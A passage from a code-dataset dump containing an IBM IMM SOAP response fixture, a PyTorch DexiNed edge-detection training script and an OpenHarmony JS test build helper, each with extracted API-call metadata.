2</FRUName><SerialNumber>K141115Y2BK</SerialNumber><MfgID>ACBE</MfgID><Action>Added</Action><TimeStamp>01/27/2012:10:28:39</TimeStamp></ComponentActivityLog><VPD><FirmwareName>IMM</FirmwareName><VersionString>YUOOC7E</VersionString><ReleaseDate>09/30/2011</ReleaseDate></VPD><VPD><FirmwareName>UEFI</FirmwareName><VersionString>D6E154A</VersionString><ReleaseDate>09/23/2011</ReleaseDate></VPD><VPD><FirmwareName>DSA</FirmwareName><VersionString>DSYT89P </VersionString><ReleaseDate>10/28/2011</ReleaseDate></VPD></GetVitalProductDataResponse></GetVitalProductDataResponse></s:Body></s:Envelope>
'''
sn_response = '''<?xml version="1.0"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:wxf="http://schemas.xmlsoap.org/ws/2004/09/transfer"><s:Header><wsa:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:To><wsa:Action>http://www.ibm.com/iBMC/sp/iBMCControl/GetSPNameSettingsResponse</wsa:Action><wsa:RelatesTo>dt:1348742647137</wsa:RelatesTo><wsa:From><wsa:Address>http://10.10.10.10/wsman</wsa:Address></wsa:From><wsa:MessageID>uuid:d2ac4b59-9f60-456e-a182-6a077557e4c1</wsa:MessageID></s:Header><s:Body><GetSPNameSettingsResponse><SPName>SN# KD55ARA</SPName></GetSPNameSettingsResponse></s:Body></s:Envelope>
'''
processors_response = '''<?xml version="1.0"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:wxf="http://schemas.xmlsoap.org/ws/2004/09/transfer"><s:Header><wsa:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:To><wsa:Action>http://www.ibm.com/iBMC/sp/Monitors/GetProcessorInfoResponse</wsa:Action><wsa:RelatesTo>dt:1348757382511</wsa:RelatesTo><wsa:From><wsa:Address>http://rack-605-12-mgmt.dc2/wsman</wsa:Address></wsa:From><wsa:MessageID>uuid:9e5ec08d-0fac-449a-80fa-37cc78290a21</wsa:MessageID></s:Header><s:Body><GetProcessorInfoResponse><Processor><ProcessorInfo><Description>Processor 1</Description><Speed>2666</Speed><Identifier>3030363735304141</Identifier><Type>Central</Type><Family>Intel Xeon</Family><Cores>8</Cores><Threads>1</Threads><Voltage>1.087000</Voltage><Datawidth>64</Datawidth></ProcessorInfo><ProcessorInfo><Description>Processor 2</Description><Speed>2666</Speed><Identifier>3030363735304141</Identifier><Type>Central</Type><Family>Intel Xeon</Family><Cores>8</Cores><Threads>1</Threads><Voltage>1.087000</Voltage><Datawidth>64</Datawidth></ProcessorInfo></Processor></GetProcessorInfoResponse></s:Body></s:Envelope>
'''
| [] |
AdrienCourtois/DexiNed | main.py | 1198c043f4ed46efd7ad7bc77edf39ba66f0f3b1 |
from __future__ import print_function
import argparse
import os
import time, platform
import cv2
import torch
import torch.optim as optim
from torch.utils.data import DataLoader
from datasets import DATASET_NAMES, BipedDataset, TestDataset, dataset_info
from losses import *
from model import DexiNed
# from model0C import DexiNed
from utils import (image_normalization, save_image_batch_to_disk,
visualize_result)
IS_LINUX = True if platform.system()=="Linux" else False
def train_one_epoch(epoch, dataloader, model, criterion, optimizer, device,
log_interval_vis, tb_writer, args=None):
imgs_res_folder = os.path.join(args.output_dir, 'current_res')
os.makedirs(imgs_res_folder,exist_ok=True)
# Put model in training mode
model.train()
# l_weight = [0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 1.1] # for bdcn ori loss
# before [0.6,0.6,1.1,1.1,0.4,0.4,1.3] [0.4,0.4,1.1,1.1,0.6,0.6,1.3],[0.4,0.4,1.1,1.1,0.8,0.8,1.3]
l_weight = [0.7,0.7,1.1,1.1,0.3,0.3,1.3] # for bdcn loss theory 3 before the last 1.3 0.6-0..5
# l_weight = [[0.05, 2.], [0.05, 2.], [0.05, 2.],
# [0.1, 1.], [0.1, 1.], [0.1, 1.],
# [0.01, 4.]] # for cats loss
for batch_id, sample_batched in enumerate(dataloader):
images = sample_batched['images'].to(device) # BxCxHxW
labels = sample_batched['labels'].to(device) # BxHxW
preds_list = model(images)
# loss = sum([criterion(preds, labels, l_w, device) for preds, l_w in zip(preds_list, l_weight)]) # cats_loss
loss = sum([criterion(preds, labels,l_w)/args.batch_size for preds, l_w in zip(preds_list,l_weight)]) # bdcn_loss
# loss = sum([criterion(preds, labels) for preds in preds_list]) #HED loss, rcf_loss
optimizer.zero_grad()
loss.backward()
optimizer.step()
if tb_writer is not None:
tb_writer.add_scalar('loss',
loss.detach(),
(len(dataloader) * epoch + batch_id))
if batch_id % 5 == 0:
print(time.ctime(), 'Epoch: {0} Sample {1}/{2} Loss: {3}'
.format(epoch, batch_id, len(dataloader), loss.item()))
if batch_id % log_interval_vis == 0:
res_data = []
img = images.cpu().numpy()
res_data.append(img[2])
ed_gt = labels.cpu().numpy()
res_data.append(ed_gt[2])
# tmp_pred = tmp_preds[2,...]
for i in range(len(preds_list)):
tmp = preds_list[i]
tmp = tmp[2]
# print(tmp.shape)
tmp = torch.sigmoid(tmp).unsqueeze(dim=0)
tmp = tmp.cpu().detach().numpy()
res_data.append(tmp)
vis_imgs = visualize_result(res_data, arg=args)
del tmp, res_data
vis_imgs = cv2.resize(vis_imgs,
(int(vis_imgs.shape[1]*0.8), int(vis_imgs.shape[0]*0.8)))
img_test = 'Epoch: {0} Sample {1}/{2} Loss: {3}' \
.format(epoch, batch_id, len(dataloader), loss.item())
BLACK = (0, 0, 255)
font = cv2.FONT_HERSHEY_SIMPLEX
font_size = 1.1
font_color = BLACK
font_thickness = 2
x, y = 30, 30
vis_imgs = cv2.putText(vis_imgs,
img_test,
(x, y),
font, font_size, font_color, font_thickness, cv2.LINE_AA)
cv2.imwrite(os.path.join(imgs_res_folder, 'results.png'), vis_imgs)
def validate_one_epoch(epoch, dataloader, model, device, output_dir, arg=None):
# XXX This is not really validation, but testing
# Put model in eval mode
model.eval()
with torch.no_grad():
for _, sample_batched in enumerate(dataloader):
images = sample_batched['images'].to(device)
# labels = sample_batched['labels'].to(device)
file_names = sample_batched['file_names']
image_shape = sample_batched['image_shape']
preds = model(images)
# print('pred shape', preds[0].shape)
save_image_batch_to_disk(preds[-1],
output_dir,
file_names,img_shape=image_shape,
arg=arg)
def test(checkpoint_path, dataloader, model, device, output_dir, args):
if not os.path.isfile(checkpoint_path):
raise FileNotFoundError(
f"Checkpoint filte note found: {checkpoint_path}")
print(f"Restoring weights from: {checkpoint_path}")
model.load_state_dict(torch.load(checkpoint_path,
map_location=device))
# Put model in evaluation mode
model.eval()
with torch.no_grad():
total_duration = []
for batch_id, sample_batched in enumerate(dataloader):
images = sample_batched['images'].to(device)
if not args.test_data == "CLASSIC":
labels = sample_batched['labels'].to(device)
file_names = sample_batched['file_names']
image_shape = sample_batched['image_shape']
print(f"input tensor shape: {images.shape}")
# images = images[:, [2, 1, 0], :, :]
start_time = time.time()
preds = model(images)
tmp_duration = time.time() - start_time
total_duration.append(tmp_duration)
save_image_batch_to_disk(preds,
output_dir,
file_names,
image_shape,
arg=args)
torch.cuda.empty_cache()
total_duration = np.array(total_duration)
print("******** Testing finished in", args.test_data, "dataset. *****")
print("Average time per image: %f.4" % total_duration.mean(), "seconds")
print("Time spend in the Dataset: %f.4" % total_duration.sum(), "seconds")
def testPich(checkpoint_path, dataloader, model, device, output_dir, args):
# a test model plus the interganged channels
if not os.path.isfile(checkpoint_path):
raise FileNotFoundError(
f"Checkpoint filte note found: {checkpoint_path}")
print(f"Restoring weights from: {checkpoint_path}")
model.load_state_dict(torch.load(checkpoint_path,
map_location=device))
# Put model in evaluation mode
model.eval()
with torch.no_grad():
total_duration = []
for batch_id, sample_batched in enumerate(dataloader):
images = sample_batched['images'].to(device)
if not args.test_data == "CLASSIC":
labels = sample_batched['labels'].to(device)
file_names = sample_batched['file_names']
image_shape = sample_batched['image_shape']
print(f"input tensor shape: {images.shape}")
start_time = time.time()
# images2 = images[:, [1, 0, 2], :, :] #GBR
images2 = images[:, [2, 1, 0], :, :] # RGB
preds = model(images)
preds2 = model(images2)
tmp_duration = time.time() - start_time
total_duration.append(tmp_duration)
save_image_batch_to_disk([preds,preds2],
output_dir,
file_names,
image_shape,
arg=args, is_inchannel=True)
torch.cuda.empty_cache()
total_duration = np.array(total_duration)
print("******** Testing finished in", args.test_data, "dataset. *****")
print("Average time per image: %f.4" % total_duration.mean(), "seconds")
print("Time spend in the Dataset: %f.4" % total_duration.sum(), "seconds")
def parse_args():
"""Parse command line arguments."""
parser = argparse.ArgumentParser(description='DexiNed trainer.')
parser.add_argument('--choose_test_data',
type=int,
default=3,
help='Already set the dataset for testing choice: 0 - 8')
# ----------- test -------0--
TEST_DATA = DATASET_NAMES[parser.parse_args().choose_test_data] # max 8
test_inf = dataset_info(TEST_DATA, is_linux=IS_LINUX)
test_dir = test_inf['data_dir']
is_testing = True # current test _bdcnlossNew256-sd7-1.10.4p5
# Training settings
TRAIN_DATA = DATASET_NAMES[0] # BIPED=0
train_inf = dataset_info(TRAIN_DATA, is_linux=IS_LINUX)
train_dir = train_inf['data_dir']
# Data parameters
parser.add_argument('--input_dir',
type=str,
default=train_dir,
help='the path to the directory with the input data.')
parser.add_argument('--input_val_dir',
type=str,
default=test_inf['data_dir'],
help='the path to the directory with the input data for validation.')
parser.add_argument('--output_dir',
type=str,
default='checkpoints',
help='the path to output the results.')
parser.add_argument('--train_data',
type=str,
choices=DATASET_NAMES,
default=TRAIN_DATA,
help='Name of the dataset.')
parser.add_argument('--test_data',
type=str,
choices=DATASET_NAMES,
default=TEST_DATA,
help='Name of the dataset.')
parser.add_argument('--test_list',
type=str,
default=test_inf['test_list'],
help='Dataset sample indices list.')
parser.add_argument('--train_list',
type=str,
default=train_inf['train_list'],
help='Dataset sample indices list.')
parser.add_argument('--is_testing',type=bool,
default=is_testing,
help='Script in testing mode.')
parser.add_argument('--double_img',
type=bool,
default=True,
help='True: use same 2 imgs changing channels') # Just for test
parser.add_argument('--resume',
type=bool,
default=False,
help='use previous trained data') # Just for test
parser.add_argument('--checkpoint_data',
type=str,
default='14/14_model.pth',
help='Checkpoint path from which to restore model weights from.')
parser.add_argument('--test_img_width',
type=int,
default=test_inf['img_width'],
help='Image width for testing.')
parser.add_argument('--test_img_height',
type=int,
default=test_inf['img_height'],
help='Image height for testing.')
parser.add_argument('--res_dir',
type=str,
default='result',
help='Result directory')
parser.add_argument('--log_interval_vis',
type=int,
default=50,
help='The number of batches to wait before printing test predictions.')
parser.add_argument('--epochs',
type=int,
default=22,
metavar='N',
help='Number of training epochs (default: 25).')
parser.add_argument('--lr',
default=1e-4,
type=float,
help='Initial learning rate.')
parser.add_argument('--wd',
type=float,
default=1e-4,
metavar='WD',
help='weight decay (default: 1e-4)')
# parser.add_argument('--lr_stepsize',
# default=1e4,
# type=int,
# help='Learning rate step size.')
parser.add_argument('--batch_size',
type=int,
default=8,
metavar='B',
help='the mini-batch size (default: 8)')
parser.add_argument('--workers',
default=8,
type=int,
help='The number of workers for the dataloaders.')
parser.add_argument('--tensorboard',type=bool,
default=True,
help='Use Tensorboard for logging.'),
parser.add_argument('--img_width',
type=int,
default=480,
help='Image width for training.') # BIPED 400 BSDS 352 MDBD 480
parser.add_argument('--img_height',
type=int,
default=480,
help='Image height for training.') # BIPED 400 BSDS 352
parser.add_argument('--channel_swap',
default=[2, 1, 0],
type=int)
parser.add_argument('--crop_img',
default=True,
type=bool,
help='If true crop training images, else resize images to match image width and height.')
parser.add_argument('--mean_pixel_values',
default=[103.939,116.779,123.68, 137.86],
type=float) # [103.939,116.779,123.68] [104.00699, 116.66877, 122.67892]
args = parser.parse_args()
return args
def main(args):
"""Main function."""
print(f"Number of GPU's available: {torch.cuda.device_count()}")
print(f"Pytorch version: {torch.__version__}")
# Tensorboard summary writer
tb_writer = None
training_dir = os.path.join(args.output_dir,args.train_data)
os.makedirs(training_dir,exist_ok=True)
checkpoint_path = os.path.join(args.output_dir, args.train_data, args.checkpoint_data)
if args.tensorboard and not args.is_testing:
# from tensorboardX import SummaryWriter # previous torch version
from torch.utils.tensorboard import SummaryWriter # for torch 1.4 or greather
tb_writer = SummaryWriter(log_dir=training_dir)
# Get computing device
device = torch.device('cpu' if torch.cuda.device_count() == 0
else 'cuda')
# Instantiate model and move it to the computing device
model = DexiNed().to(device)
# model = nn.DataParallel(model)
ini_epoch =0
if not args.is_testing:
if args.resume:
ini_epoch=17
model.load_state_dict(torch.load(checkpoint_path,
map_location=device))
dataset_train = BipedDataset(args.input_dir,
img_width=args.img_width,
img_height=args.img_height,
mean_bgr=args.mean_pixel_values[0:3] if len(
args.mean_pixel_values) == 4 else args.mean_pixel_values,
train_mode='train',
arg=args
)
dataloader_train = DataLoader(dataset_train,
batch_size=args.batch_size,
shuffle=True,
num_workers=args.workers)
dataset_val = TestDataset(args.input_val_dir,
test_data=args.test_data,
img_width=args.test_img_width,
img_height=args.test_img_height,
mean_bgr=args.mean_pixel_values[0:3] if len(
args.mean_pixel_values) == 4 else args.mean_pixel_values,
test_list=args.test_list, arg=args
)
dataloader_val = DataLoader(dataset_val,
batch_size=1,
shuffle=False,
num_workers=args.workers)
# Testing
if args.is_testing:
output_dir = os.path.join(args.res_dir, args.train_data+"2"+ args.test_data)
print(f"output_dir: {output_dir}")
if args.double_img:
# predict twice an image changing channels, then mix those results
testPich(checkpoint_path, dataloader_val, model, device, output_dir, args)
else:
test(checkpoint_path, dataloader_val, model, device, output_dir, args)
return
criterion = bdcn_loss2
optimizer = optim.Adam(model.parameters(),
lr=args.lr,
weight_decay=args.wd)
# lr_schd = lr_scheduler.StepLR(optimizer, step_size=args.lr_stepsize,
# gamma=args.lr_gamma)
# Main training loop
seed=1021
for epoch in range(ini_epoch,args.epochs):
if epoch%7==0:
seed = seed+1000
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
print("------ Random seed applied-------------")
# Create output directories
output_dir_epoch = os.path.join(args.output_dir,args.train_data, str(epoch))
img_test_dir = os.path.join(output_dir_epoch, args.test_data + '_res')
os.makedirs(output_dir_epoch,exist_ok=True)
os.makedirs(img_test_dir,exist_ok=True)
train_one_epoch(epoch,
dataloader_train,
model,
criterion,
optimizer,
device,
args.log_interval_vis,
tb_writer,
args=args)
validate_one_epoch(epoch,
dataloader_val,
model,
device,
img_test_dir,
arg=args)
# Save model after end of every epoch
torch.save(model.module.state_dict() if hasattr(model, "module") else model.state_dict(),
os.path.join(output_dir_epoch, '{0}_model.pth'.format(epoch)))
if __name__ == '__main__':
args = parse_args()
main(args)
| [((23, 22, 23, 66), 'os.path.join', 'os.path.join', ({(23, 35, 23, 50): 'args.output_dir', (23, 52, 23, 65): '"""current_res"""'}, {}), "(args.output_dir, 'current_res')", False, 'import os\n'), ((24, 4, 24, 46), 'os.makedirs', 'os.makedirs', (), '', False, 'import os\n'), ((193, 13, 193, 68), 'argparse.ArgumentParser', 'argparse.ArgumentParser', (), '', False, 'import argparse\n'), ((202, 15, 202, 57), 'datasets.dataset_info', 'dataset_info', (), '', False, 'from datasets import DATASET_NAMES, BipedDataset, TestDataset, dataset_info\n'), ((208, 16, 208, 59), 'datasets.dataset_info', 'dataset_info', (), '', False, 'from datasets import DATASET_NAMES, BipedDataset, TestDataset, dataset_info\n'), ((336, 19, 336, 64), 'os.path.join', 'os.path.join', ({(336, 32, 336, 47): 'args.output_dir', (336, 48, 336, 63): 'args.train_data'}, {}), '(args.output_dir, args.train_data)', False, 'import os\n'), ((337, 4, 337, 43), 'os.makedirs', 'os.makedirs', (), '', False, 'import os\n'), ((338, 22, 338, 90), 'os.path.join', 'os.path.join', ({(338, 35, 338, 50): 'args.output_dir', (338, 52, 338, 67): 'args.train_data', (338, 69, 338, 89): 'args.checkpoint_data'}, {}), '(args.output_dir, args.train_data, args.checkpoint_data)', False, 'import os\n'), ((378, 21, 381, 57), 'torch.utils.data.DataLoader', 'DataLoader', (), '', False, 'from torch.utils.data import DataLoader\n'), ((20, 19, 20, 36), 'platform.system', 'platform.system', ({}, {}), '()', False, 'import time, platform\n'), ((99, 9, 99, 24), 'torch.no_grad', 'torch.no_grad', ({}, {}), '()', False, 'import torch\n'), ((114, 11, 114, 42), 'os.path.isfile', 'os.path.isfile', ({(114, 26, 114, 41): 'checkpoint_path'}, {}), '(checkpoint_path)', False, 'import os\n'), ((118, 26, 119, 57), 'torch.load', 'torch.load', (), '', False, 'import torch\n'), ((124, 9, 124, 24), 'torch.no_grad', 'torch.no_grad', ({}, {}), '()', False, 'import torch\n'), ((152, 11, 152, 42), 'os.path.isfile', 'os.path.isfile', ({(152, 26, 152, 41): 'checkpoint_path'}, {}), '(checkpoint_path)', False, 'import os\n'), ((156, 26, 157, 57), 'torch.load', 'torch.load', (), '', False, 'import torch\n'), ((162, 9, 162, 24), 'torch.no_grad', 'torch.no_grad', ({}, {}), '()', False, 'import torch\n'), ((342, 20, 342, 55), 'torch.utils.tensorboard.SummaryWriter', 'SummaryWriter', (), '', False, 'from torch.utils.tensorboard import SummaryWriter\n'), ((365, 27, 368, 63), 'torch.utils.data.DataLoader', 'DataLoader', (), '', False, 'from torch.utils.data import DataLoader\n'), ((385, 21, 385, 84), 'os.path.join', 'os.path.join', ({(385, 34, 385, 46): 'args.res_dir', (385, 48, 385, 83): "args.train_data + '2' + args.test_data"}, {}), "(args.res_dir, args.train_data + '2' + args.test_data)", False, 'import os\n'), ((415, 23, 415, 78), 'os.path.join', 'os.path.join', ({(415, 36, 415, 52): 'output_dir_epoch', (415, 54, 415, 77): "args.test_data + '_res'"}, {}), "(output_dir_epoch, args.test_data + '_res')", False, 'import os\n'), ((416, 8, 416, 51), 'os.makedirs', 'os.makedirs', (), '', False, 'import os\n'), ((417, 8, 417, 47), 'os.makedirs', 'os.makedirs', (), '', False, 'import os\n'), ((72, 23, 72, 59), 'utils.visualize_result', 'visualize_result', (), '', False, 'from utils import image_normalization, save_image_batch_to_disk, visualize_result\n'), ((86, 23, 89, 92), 'cv2.putText', 'cv2.putText', ({(86, 35, 86, 43): 'vis_imgs', (87, 35, 87, 43): 'img_test', (88, 35, 88, 41): '(x, y)', (89, 35, 89, 39): 'font', (89, 41, 89, 50): 'font_size', (89, 52, 89, 62): 'font_color', (89, 64, 89, 78): 'font_thickness', (89, 80, 89, 91): 'cv2.LINE_AA'}, {}), '(vis_imgs, img_test, (x, y), font, font_size, font_color,\n font_thickness, cv2.LINE_AA)', False, 'import cv2\n'), ((107, 12, 110, 45), 'utils.save_image_batch_to_disk', 'save_image_batch_to_disk', (), '', False, 'from utils import image_normalization, save_image_batch_to_disk, visualize_result\n'), ((134, 25, 134, 36), 'time.time', 'time.time', ({}, {}), '()', False, 'import time, platform\n'), ((138, 12, 142, 46), 'utils.save_image_batch_to_disk', 'save_image_batch_to_disk', (), '', False, 'from utils import image_normalization, save_image_batch_to_disk, visualize_result\n'), ((143, 12, 143, 36), 'torch.cuda.empty_cache', 'torch.cuda.empty_cache', ({}, {}), '()', False, 'import torch\n'), ((171, 25, 171, 36), 'time.time', 'time.time', ({}, {}), '()', False, 'import time, platform\n'), ((178, 12, 182, 65), 'utils.save_image_batch_to_disk', 'save_image_batch_to_disk', (), '', False, 'from utils import image_normalization, save_image_batch_to_disk, visualize_result\n'), ((183, 12, 183, 36), 'torch.cuda.empty_cache', 'torch.cuda.empty_cache', ({}, {}), '()', False, 'import torch\n'), ((349, 12, 349, 21), 'model.DexiNed', 'DexiNed', ({}, {}), '()', False, 'from model import DexiNed\n'), ((409, 12, 409, 35), 'torch.manual_seed', 'torch.manual_seed', ({(409, 30, 409, 34): 'seed'}, {}), '(seed)', False, 'import torch\n'), ((410, 12, 410, 40), 'torch.cuda.manual_seed', 'torch.cuda.manual_seed', ({(410, 35, 410, 39): 'seed'}, {}), '(seed)', False, 'import torch\n'), ((52, 18, 52, 30), 'time.ctime', 'time.ctime', ({}, {}), '()', False, 'import time, platform\n'), ((90, 24, 90, 68), 'os.path.join', 'os.path.join', ({(90, 37, 90, 52): 'imgs_res_folder', (90, 54, 90, 67): '"""results.png"""'}, {}), "(imgs_res_folder, 'results.png')", False, 'import os\n'), ((136, 27, 136, 38), 'time.time', 'time.time', ({}, {}), '()', False, 'import time, platform\n'), ((176, 27, 176, 38), 'time.time', 'time.time', ({}, {}), '()', False, 'import time, platform\n'), ((330, 40, 330, 65), 'torch.cuda.device_count', 'torch.cuda.device_count', ({}, {}), '()', False, 'import torch\n'), ((345, 35, 345, 60), 'torch.cuda.device_count', 'torch.cuda.device_count', ({}, {}), '()', False, 'import torch\n'), ((355, 34, 356, 61), 'torch.load', 'torch.load', (), '', False, 'import torch\n'), ((68, 22, 68, 40), 'torch.sigmoid', 'torch.sigmoid', ({(68, 36, 68, 39): 'tmp'}, {}), '(tmp)', False, 'import torch\n')] |
chaoyangcui/test_developertest | src/core/build/pretreat_targets.py | 151309bf6cdc7e31493a3461d3c7f17a1b371c09 | #!/usr/bin/env python3
# coding=utf-8
#
# Copyright (c) 2021 Huawei Device Co., Ltd.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import json
import shutil
from core.constants import JsTestConst
from xdevice import platform_logger
LOG = platform_logger("PretreatTargets")
##############################################################################
##############################################################################
class PretreatTargets(object):
def __init__(self, target_list):
self.path_list = []
self.name_list = []
self.target_list = target_list
def pretreat_targets_from_list(self):
path_list, name_list = self._parse_target_info()
self._pretreat_by_target_name(path_list, name_list)
def disassemble_targets_from_list(self):
self._disassemble_by_target_name(self.path_list, self.name_list)
def _parse_target_info(self):
path_list = []
name_list = []
for line in self.target_list:
path = line.split(':')[0][2:]
name = line.split(':')[1].split('(')[0]
path_list.append(path)
name_list.append(name)
return path_list, name_list
def _pretreat_by_target_name(self, path_list, name_list):
for name, path in zip(name_list, path_list):
if name.endswith("JsTest"):
if self._pretreat_js_target(path, name):
self.path_list.append(path)
self.name_list.append(name)
LOG.info("js test %s pretreat success" % name)
def _pretreat_js_target(self, path, name):
template_path = os.path.join(sys.framework_root_dir, "libs",
"js_template", "src")
target_path = os.path.join(sys.source_code_root_path, path)
config_path = os.path.join(target_path, "config.json")
gn_path = os.path.join(target_path, "BUILD.gn")
gn_bak_path = os.path.join(target_path, "BuildBak")
test_path = os.path.join(target_path, "src", "main", "js",
"default", "test")
if not os.path.exists(config_path):
LOG.error("js test needs config.json file")
return False
if not os.path.exists(gn_path):
LOG.error("js test needs BUILD.gn file")
return False
LOG.info("target_path: %s" % target_path)
#modify BUILD.gn file to compile hap
output_path = self._parse_output_path_in_gn(gn_path)
if output_path == "":
LOG.error(" BUILD.gn needs 'module_output_path'")
return
os.rename(gn_path, gn_bak_path)
template_args = {'output_path': output_path, 'suite_name': name}
with open(gn_path, 'w') as filehandle:
filehandle.write(JsTestConst.BUILD_GN_FILE_TEMPLATE %
template_args)
#copy js hap template to target path
shutil.copytree(template_path, os.path.join(target_path, "src"))
shutil.copy(config_path, os.path.join(target_path, "src", "main"))
file_name = os.listdir(target_path)
for file in file_name:
if file.endswith(".js"):
LOG.info("file: %s" % file)
shutil.copy(os.path.join(target_path, file), test_path)
with open(os.path.join(test_path, "List.test.js"), 'a') \
as list_data:
list_data.write("require('./%s')" % file)
#modify i18n json file
i18n_path = os.path.join(target_path, "src", "main", "js",
"default", "i18n", "en-US.json")
json_data = ""
with open(i18n_path, 'r') as i18n_file:
lines = i18n_file.readlines()
for line in lines:
if "TargetName" in line:
line = line.replace("TargetName", name)
json_data += line
with open(i18n_path, 'w') as i18n_file:
i18n_file.write(json_data)
return True
def _parse_output_path_in_gn(self, gn_path):
output_path = ""
with open(gn_path, 'r') as gn_file:
for line in gn_file.readlines():
if line.startswith("module_output_path"):
output_path = line.split()[2].strip('"')
break
return output_path
def _disassemble_by_target_name(self, path_list, name_list):
for name, path in zip(name_list, path_list):
LOG.info("name: %s path: %s" % (name, path))
if name.endswith("JsTest"):
self._disassemble_js_target(path, name)
LOG.info("js test %s disassemble success" % name)
def _disassemble_js_target(self, path, name):
target_path = os.path.join(sys.source_code_root_path, path)
src_path = os.path.join(target_path, "src")
gn_path = os.path.join(target_path, "BUILD.gn")
gn_bak_path = os.path.join(target_path, "BuildBak")
if os.path.exists(src_path):
shutil.rmtree(src_path)
if os.path.exists(gn_path) and os.path.exists(gn_bak_path):
os.remove(gn_path)
os.rename(gn_bak_path, gn_path)
##############################################################################
##############################################################################
| [((27, 6, 27, 40), 'xdevice.platform_logger', 'platform_logger', ({(27, 22, 27, 39): '"""PretreatTargets"""'}, {}), "('PretreatTargets')", False, 'from xdevice import platform_logger\n'), ((67, 24, 68, 58), 'os.path.join', 'os.path.join', ({(67, 37, 67, 59): 'sys.framework_root_dir', (67, 61, 67, 67): '"""libs"""', (68, 37, 68, 50): '"""js_template"""', (68, 52, 68, 57): '"""src"""'}, {}), "(sys.framework_root_dir, 'libs', 'js_template', 'src')", False, 'import os\n'), ((69, 22, 69, 67), 'os.path.join', 'os.path.join', ({(69, 35, 69, 60): 'sys.source_code_root_path', (69, 62, 69, 66): 'path'}, {}), '(sys.source_code_root_path, path)', False, 'import os\n'), ((70, 22, 70, 62), 'os.path.join', 'os.path.join', ({(70, 35, 70, 46): 'target_path', (70, 48, 70, 61): '"""config.json"""'}, {}), "(target_path, 'config.json')", False, 'import os\n'), ((71, 18, 71, 55), 'os.path.join', 'os.path.join', ({(71, 31, 71, 42): 'target_path', (71, 44, 71, 54): '"""BUILD.gn"""'}, {}), "(target_path, 'BUILD.gn')", False, 'import os\n'), ((72, 22, 72, 59), 'os.path.join', 'os.path.join', ({(72, 35, 72, 46): 'target_path', (72, 48, 72, 58): '"""BuildBak"""'}, {}), "(target_path, 'BuildBak')", False, 'import os\n'), ((73, 20, 74, 51), 'os.path.join', 'os.path.join', ({(73, 33, 73, 44): 'target_path', (73, 46, 73, 51): '"""src"""', (73, 53, 73, 59): '"""main"""', (73, 61, 73, 65): '"""js"""', (74, 33, 74, 42): '"""default"""', (74, 44, 74, 50): '"""test"""'}, {}), "(target_path, 'src', 'main', 'js', 'default', 'test')", False, 'import os\n'), ((88, 8, 88, 39), 'os.rename', 'os.rename', ({(88, 18, 88, 25): 'gn_path', (88, 27, 88, 38): 'gn_bak_path'}, {}), '(gn_path, gn_bak_path)', False, 'import os\n'), ((97, 20, 97, 43), 'os.listdir', 'os.listdir', ({(97, 31, 97, 42): 'target_path'}, {}), '(target_path)', False, 'import os\n'), ((107, 20, 108, 65), 'os.path.join', 'os.path.join', ({(107, 33, 107, 44): 'target_path', (107, 46, 107, 51): '"""src"""', (107, 53, 107, 59): '"""main"""', (107, 61, 107, 65): '"""js"""', (108, 33, 108, 42): '"""default"""', (108, 44, 108, 50): '"""i18n"""', (108, 52, 108, 64): '"""en-US.json"""'}, {}), "(target_path, 'src', 'main', 'js', 'default', 'i18n', 'en-US.json')", False, 'import os\n'), ((137, 22, 137, 67), 'os.path.join', 'os.path.join', ({(137, 35, 137, 60): 'sys.source_code_root_path', (137, 62, 137, 66): 'path'}, {}), '(sys.source_code_root_path, path)', False, 'import os\n'), ((138, 19, 138, 51), 'os.path.join', 'os.path.join', ({(138, 32, 138, 43): 'target_path', (138, 45, 138, 50): '"""src"""'}, {}), "(target_path, 'src')", False, 'import os\n'), ((139, 18, 139, 55), 'os.path.join', 'os.path.join', ({(139, 31, 139, 42): 'target_path', (139, 44, 139, 54): '"""BUILD.gn"""'}, {}), "(target_path, 'BUILD.gn')", False, 'import os\n'), ((140, 22, 140, 59), 'os.path.join', 'os.path.join', ({(140, 35, 140, 46): 'target_path', (140, 48, 140, 58): '"""BuildBak"""'}, {}), "(target_path, 'BuildBak')", False, 'import os\n'), ((142, 11, 142, 35), 'os.path.exists', 'os.path.exists', ({(142, 26, 142, 34): 'src_path'}, {}), '(src_path)', False, 'import os\n'), ((75, 15, 75, 42), 'os.path.exists', 'os.path.exists', ({(75, 30, 75, 41): 'config_path'}, {}), '(config_path)', False, 'import os\n'), ((78, 15, 78, 38), 'os.path.exists', 'os.path.exists', ({(78, 30, 78, 37): 'gn_path'}, {}), '(gn_path)', False, 'import os\n'), ((95, 39, 95, 71), 'os.path.join', 'os.path.join', ({(95, 52, 95, 63): 'target_path', (95, 65, 95, 70): '"""src"""'}, {}), "(target_path, 'src')", False, 'import os\n'), ((96, 33, 96, 73), 'os.path.join', 'os.path.join', ({(96, 46, 96, 57): 'target_path', (96, 59, 96, 64): '"""src"""', (96, 66, 96, 72): '"""main"""'}, {}), "(target_path, 'src', 'main')", False, 'import os\n'), ((143, 12, 143, 35), 'shutil.rmtree', 'shutil.rmtree', ({(143, 26, 143, 34): 'src_path'}, {}), '(src_path)', False, 'import shutil\n'), ((144, 11, 144, 34), 'os.path.exists', 'os.path.exists', ({(144, 26, 144, 33): 'gn_path'}, {}), '(gn_path)', False, 'import os\n'), ((144, 39, 144, 66), 'os.path.exists', 'os.path.exists', ({(144, 54, 144, 65): 'gn_bak_path'}, {}), '(gn_bak_path)', False, 'import os\n'), ((145, 12, 145, 30), 'os.remove', 'os.remove', ({(145, 22, 145, 29): 'gn_path'}, {}), '(gn_path)', False, 'import os\n'), 